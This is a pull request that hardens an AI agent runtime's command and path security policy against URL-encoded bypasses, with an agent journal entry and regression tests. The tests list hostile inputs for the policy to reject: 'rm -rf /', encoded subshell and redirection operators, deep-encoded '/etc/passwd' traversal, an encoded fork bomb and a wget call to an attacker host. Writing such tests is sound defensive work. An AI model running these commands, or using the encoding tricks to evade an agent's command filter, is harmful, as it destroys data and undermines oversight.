### PR TITLE
fix(security): block URL-encoded policy bypasses

### DIFF
--- a/.agents/journal/sentinnel-journal.md
+++ b/.agents/journal/sentinnel-journal.md
@@ -21,3 +21,8 @@
 
 **Learning:** The `SecurityPolicy` was vulnerable to path validation bypass when absolute paths or traversal sequences were passed within command flags (e.g., `grep --file=/etc/passwd` or `git -C/etc status`). The argument validation loop was only checking standalone arguments and not extracting values from flag assignments.
 **Action:** Updated the argument validation loop in `is_segment_valid` to extract and validate potential paths from flags (`--key=value` and `-Cvalue`). This ensures that security checks (traversal, workspace bounds, forbidden paths) are applied consistently to all path-like inputs, even when embedded in flags.
+
+## 2025-05-24 - Unified URL Decoding across SecurityPolicy entry points
+
+**Learning:** URL encoding was being used to bypass shell operator checks and risk classification in `is_command_allowed` and `command_risk_level`. While `is_path_allowed` was already decoding inputs, other entry points were vulnerable to encoded redirection (`%3e`), background (`%26`), and subshell (`%24%28`) operators.
+**Action:** Centralized iterative URL decoding into a helper function and applied it consistently at the start of `is_path_allowed`, `is_command_allowed`, and `command_risk_level`. This ensures that all security filters operate on normalized input, preventing obfuscation-based bypasses.

--- a/clients/agent-runtime/src/security/policy.rs
+++ b/clients/agent-runtime/src/security/policy.rs
@@ -328,6 +328,11 @@ impl SecurityPolicy {
 
     /// Classify command risk. Any high-risk segment marks the whole command high.
     pub fn command_risk_level(&self, command: &str) -> CommandRiskLevel {
+        let command = iterative_url_decode(command);
+        if command.contains('%') {
+            return CommandRiskLevel::High;
+        }
+
         // Early exit on the raw command catches snippets that span segment
         // boundaries (e.g. fork bombs containing `;`).  The per-segment check
         // below is intentionally kept for snippets that appear within a single
@@ -336,7 +341,7 @@ impl SecurityPolicy {
             return CommandRiskLevel::High;
         }
 
-        let normalized = normalize_risk_segments(command);
+        let normalized = normalize_risk_segments(&command);
 
         let mut saw_medium = false;
 
@@ -421,11 +426,16 @@ impl SecurityPolicy {
             return false;
         }
 
-        if self.contains_blocked_operators(command) {
+        let command = iterative_url_decode(command);
+        if command.contains('%') {
             return false;
         }
 
-        self.validate_command_segments(command)
+        if self.contains_blocked_operators(&command) {
+            return false;
+        }
+
+        self.validate_command_segments(&command)
     }
 
     fn contains_blocked_operators(&self, command: &str) -> bool {
@@ -579,19 +589,11 @@ impl SecurityPolicy {
 
     /// Check if a file path is allowed (no path traversal, within workspace)
     pub fn is_path_allowed(&self, path: &str) -> bool {
-        // Block null bytes (can truncate paths in C-backed syscalls)
-        if path.contains('\0') {
-            return false;
-        }
+        let decoded = iterative_url_decode(path);
 
-        // Iterative URL decoding to prevent bypasses like %252e%252e (double-encoded "..")
-        let mut decoded = path.to_string();
-        for _ in 0..3 {
-            let next = urlencoding::decode(&decoded).unwrap_or_else(|_| decoded.clone().into());
-            if next == decoded {
-                break;
-            }
-            decoded = next.into_owned();
+        // Block null bytes (can truncate paths in C-backed syscalls)
+        if decoded.contains('\0') {
+            return false;
         }
 
         // Block backslashes (Windows-style separators or escaping)
@@ -830,6 +832,18 @@ fn normalize_arg_for_path_checks(token: &str) -> Option<String> {
 }
 
 /// Check whether `expanded` path starts with any of the forbidden paths.
+fn iterative_url_decode(input: &str) -> String {
+    let mut decoded = input.to_string();
+    for _ in 0..10 {
+        let next = urlencoding::decode(decoded.as_str()).unwrap_or_else(|_| decoded.clone().into());
+        if next == decoded {
+            break;
+        }
+        decoded = next.into_owned();
+    }
+    decoded
+}
+
 fn matches_any_forbidden_path(expanded: &str, forbidden_paths: &[String]) -> bool {
     let expanded_path = Path::new(expanded);
     for forbidden in forbidden_paths {
@@ -2029,6 +2043,68 @@ mod tests {
             policy.command_risk_level("wget http://attacker.example/file"),
             CommandRiskLevel::High,
             "wget must be High risk in delegated sessions"
+        );
+    }
+
+    #[test]
+    fn is_command_allowed_blocks_url_encoded_bypasses() {
+        let p = default_policy();
+
+        assert!(!p.is_command_allowed("echo secret %3e /tmp/pwned"));
+        assert!(!p.is_command_allowed("echo secret %3E /tmp/pwned"));
+        assert!(!p.is_command_allowed("ls %26 rm -rf /"));
+        assert!(!p.is_command_allowed("echo %24%28whoami%29"));
+        assert!(!p.is_command_allowed("cat ..%2f..%2fetc%2fpasswd"));
+        assert!(!p.is_command_allowed("cat secret.txt%00.jpg"));
+    }
+
+    #[test]
+    fn is_path_allowed_blocks_encoded_null_bytes() {
+        let p = default_policy();
+        assert!(!p.is_path_allowed("file.txt%00"));
+        assert!(!p.is_path_allowed("%00file.txt"));
+    }
+
+    #[test]
+    fn command_risk_level_detects_encoded_dangerous_snippets() {
+        let p = default_policy();
+        assert_eq!(p.command_risk_level("rm%20-rf%20%2f"), CommandRiskLevel::High);
+
+        let encoded_fork = "%3a%28%29%7b%3a%7c%3a%26%7d%3b%3a";
+        assert_eq!(p.command_risk_level(encoded_fork), CommandRiskLevel::High);
+    }
+
+    #[test]
+    fn deep_encoded_traversal_attacks_blocked() {
+        let p = default_policy();
+
+        assert!(
+            !p.is_command_allowed("cat %2525252e%2525252e/etc/passwd"),
+            "Deep-encoded traversal in cat command must be blocked"
+        );
+        assert!(
+            !p.is_path_allowed("%2525252e%2525252e/etc/passwd"),
+            "Deep-encoded traversal path must be blocked"
+        );
+        assert_eq!(
+            p.command_risk_level("rm %2525252e%2525252e/etc/passwd"),
+            CommandRiskLevel::High,
+            "Deep-encoded rm must be classified as High risk"
+        );
+        assert!(
+            !p.is_command_allowed("rm %2525252e%2525252e/etc/passwd"),
+            "Deep-encoded rm command must be blocked"
+        );
+
+        let deep_fork = "%253a%2528%2529%257b%253a%257c%253a%2526%257d%253b%253a";
+        assert_eq!(
+            p.command_risk_level(deep_fork),
+            CommandRiskLevel::High,
+            "Deep-encoded fork bomb must be classified as High risk"
+        );
+        assert!(
+            !p.is_command_allowed(deep_fork),
+            "Deep-encoded fork bomb must be blocked"
         );
     }
 

--- a/clients/agent-runtime/src/security/policy.rs
+++ b/clients/agent-runtime/src/security/policy.rs
@@ -2068,7 +2068,10 @@ mod tests {
     #[test]
     fn command_risk_level_detects_encoded_dangerous_snippets() {
         let p = default_policy();
-        assert_eq!(p.command_risk_level("rm%20-rf%20%2f"), CommandRiskLevel::High);
+        assert_eq!(
+            p.command_risk_level("rm%20-rf%20%2f"),
+            CommandRiskLevel::High
+        );
 
         let encoded_fork = "%3a%28%29%7b%3a%7c%3a%26%7d%3b%3a";
         assert_eq!(p.command_risk_level(encoded_fork), CommandRiskLevel::High);


### PR DESCRIPTION
## Related Issues

Replaces #658.

---

## Summary

- normalize URL-encoded command and path input before `SecurityPolicy` evaluates risk or allowability
- block encoded operators, deep-encoded traversal payloads, and encoded null-byte tricks that previously bypassed policy checks
- add regression coverage for encoded command bypasses and deep-encoding attack variants

---

## Tested Information

- Ran `cargo test --lib security::policy::tests::`
- Ran targeted regression tests during red/green development for the new encoded-bypass cases in `clients/agent-runtime`
- The branch also passed the repository pre-push Rust check path while publishing `fix/security-unified-decoding`

---

## Documentation Impact

- Docs updated in: `.agents/journal/sentinnel-journal.md`
- No docs update required because this change only hardens internal security-policy validation and does not alter external setup, APIs, or user-facing behavior.
- [x] I verified the documentation matches the current behavior.

---

## Breaking Changes

None.

---

## Checklist

- [x] I have checked that there isn’t already a PR solving the same problem.
- [x] I have read the [Contributing Guidelines](https://github.com/dallay/corvus/blob/main/.github/CONTRIBUTING.md).
- [x] I ensured my code follows the project's style guidelines.
- [x] I have added or updated tests that prove my fix is effective or that my feature works.
- [x] I have updated the documentation, or I explained above why no documentation update is needed.
- [x] I verified the documentation matches the current behavior.
- [x] I have documented any breaking changes in the Breaking Changes section.
- [x] I have linked the related issue (if any).
